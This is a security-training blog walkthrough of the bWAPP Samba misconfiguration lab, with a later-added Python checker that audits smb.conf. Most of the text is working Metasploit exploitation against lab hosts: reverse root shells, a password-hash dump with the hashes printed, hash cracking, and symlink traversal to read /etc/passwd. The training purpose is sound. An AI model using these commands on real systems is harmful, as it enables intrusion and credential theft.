Information Security (old version) / bWAPP 2019. 2. 15. 19:47
Web Hacking bWAPP - 63. A5 - Security Misconfiguration - Arbitrary File Access (Samba)
This content was prepared for hands-on practice as part of a training course. Please note that if it is used for personal or malicious purposes, the legal responsibility lies with the person who does so.
1. Security Misconfiguration
- OWASP Top 10 A5 - Security Misconfiguration
- Vulnerabilities that arise from configuration errors in servers, systems, databases, network devices, or web settings.
- e.g. directory listing, error pages, web page comments, default web server settings, Adobe Flash vulnerabilities, DoS/DDoS attacks, Reverse_TCP attacks against specific services, local privilege vulnerabilities, backup/temporary/robots files
2. Security Misconfiguration - Arbitrary File Access (Samba)
- In this scenario the Samba server is configured insecurely, so an attacker can read or write arbitrary files.
Ex1) Understanding Insecure DOR (Order Tickets)
Select the security level and the scenario
Arbitrary file access using a Samba vulnerability
root@kali:~# nmap -sS -sV 192.168.20.205
Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-15 19:46 KST
Nmap scan report for 192.168.20.205
Host is up (0.00016s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp open ssl/http Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
666/tcp open doom?
3306/tcp open mysql?
5901/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
8080/tcp open http nginx 1.4.0
8443/tcp open ssl/http nginx 1.4.0
9080/tcp open http lighttpd 1.4.19
root@kali:~# msfdb init
root@kali:~# msfdb start
root@kali:~# msfconsole -q
msf > search samba
~ output omitted ~
msf > search exploit/unix/misc/distcc_exec
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
msf > use exploit/unix/misc/distcc_exec
msf exploit(unix/misc/distcc_exec) >
msf exploit(unix/misc/distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unix/misc/distcc_exec) > set rhost 192.168.20.205
rhost => 192.168.20.205
msf exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 192.168.20.50:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 83ZmNIz6ODbew0G4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "83ZmNIz6ODbew0G4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.20.50:4444 -> 192.168.20.205:50644) at 2019-02-15 19:55:00 +0900
pwd
/
whoami
root
(ctrl+z)
Background session 1? [y/N] y
msf exploit(unix/misc/distcc_exec) > (ctrl+z)
msf exploit(unix/misc/distcc_exec) >
[1]+ Stopped msfconsole -q
root@kali:~#
[Reference] Samba vulnerability attack carried out against 'Metasploitable2'
root@kali:~# msfconsole -q
msf > search samba
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set rhost 192.168.20.204
msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
msf exploit(multi/samba/usermap_script) > set lhost 192.168.20.50
msf exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 192.168.20.50:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Hdv1SQSXJUHz17dT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Hdv1SQSXJUHz17dT\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.20.50:4444 -> 192.168.20.204:37731) at 2019-10-25 21:26:09 +0900
id
uid=0(root) gid=0(root)
(Ctrl+z)
Background session 1? [y/N] y
msf exploit(multi/samba/usermap_script) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.20.50:4444 -> 192.168.20.204:37731 (192.168.20.204)
msf exploit(multi/samba/usermap_script) > use post/linux/gather/hashdump
msf post(linux/gather/hashdump) > show options
Module options (post/linux/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf post(linux/gather/hashdump) > set session 1
msf post(linux/gather/hashdump) > exploit
[!] SESSION may not be compatible with this module.
[+] root:$1$/6KSBwIs$u8UzErBHBXEujsUyrt6Z4.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20191025212855_default_192.168.20.204_linux.hashes_003305.txt
[*] Post module execution completed
msf post(linux/gather/hashdump) >
msf post(linux/gather/hashdump) > exit -y
root@kali:~# john /root/.msf4/loot/20191025214416_default_192.168.20.204_linux.hashes_414162.txt
root@kali:~# cp /root/.msf4/loot/20191025214416_default_192.168.20.204_linux.hashes_414162.txt metapass.txt
root@kali:~# johnny &
root@kali:~# msfconsole -q
msf > search samba
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(admin/smb/samba_symlink_traversal) > set rhost 192.168.20.204
msf auxiliary(admin/smb/samba_symlink_traversal) > set smbshare tmp
msf auxiliary(admin/smb/samba_symlink_traversal) > exploit
msf auxiliary(admin/smb/samba_symlink_traversal) > exit
root@kali:~# smbclient //192.168.20.204/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: toor
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
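As an added example (not part of the original post), a Python check that audits an smb.conf for the settings these scenarios depend on: `wide links` together with `unix extensions` (the symlink traversal used by samba_symlink_traversal), a configured `username map script` (the option the usermap_script module targets on old Samba), and guest-writable shares like the tmp share above. The option names are real Samba parameters; the sample configuration is constructed for this demonstration.

```python
# Added example, not part of the original post: audit an smb.conf for the
# misconfigurations behind the scenarios above. Option names are real Samba
# parameters; the sample config is constructed for this demonstration.
WEAK_SMB_CONF = """\
[global]
   unix extensions = yes
   wide links = yes
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
"""

def parse_smb_conf(text):
    """Minimal smb.conf parser -> {section: {key: value}}; keys lower-cased, spaces removed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current]["".join(key.lower().split())] = value.strip()
    return sections

def smb_bool(value, default):
    # Samba booleans are yes/true/1 or no/false/0; None means the option is not set
    return default if value is None else value.lower() in ("yes", "true", "1")

def share_writable(share):
    for syn in ("writable", "writeable", "writeok"):  # inverted forms of 'read only'
        if syn in share:
            return smb_bool(share[syn], False)
    return not smb_bool(share.get("readonly"), True)

def audit_smb_conf(text):
    conf = parse_smb_conf(text)
    g, findings = conf.get("global", {}), []
    # wide links + unix extensions: a client can create a symlink and follow it out of the share
    if smb_bool(g.get("widelinks"), False) and smb_bool(g.get("unixextensions"), True):
        findings.append("global: 'wide links = yes' with unix extensions enabled")
    if g.get("usernamemapscript"):  # option the usermap_script module targets on old Samba
        findings.append("global: 'username map script' is configured")
    for name, share in conf.items():
        if name != "global" and smb_bool(share.get("guestok"), False) and share_writable(share):
            findings.append(f"share [{name}]: guest (anonymous) write access")
    return findings
```

Run `audit_smb_conf(WEAK_SMB_CONF)` to see all three findings; setting `wide links = no`, removing the map script and making the share `read only = yes` (or `guest ok = no`) clears them.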
[YouTube] Video lecture link (Subscribe! Like!!!)
Web Hacking 63. A5 - bWAPP Security Misconfiguration - Arbitrary File Access (Samba) https://youtu.be/e32WzC4j7ck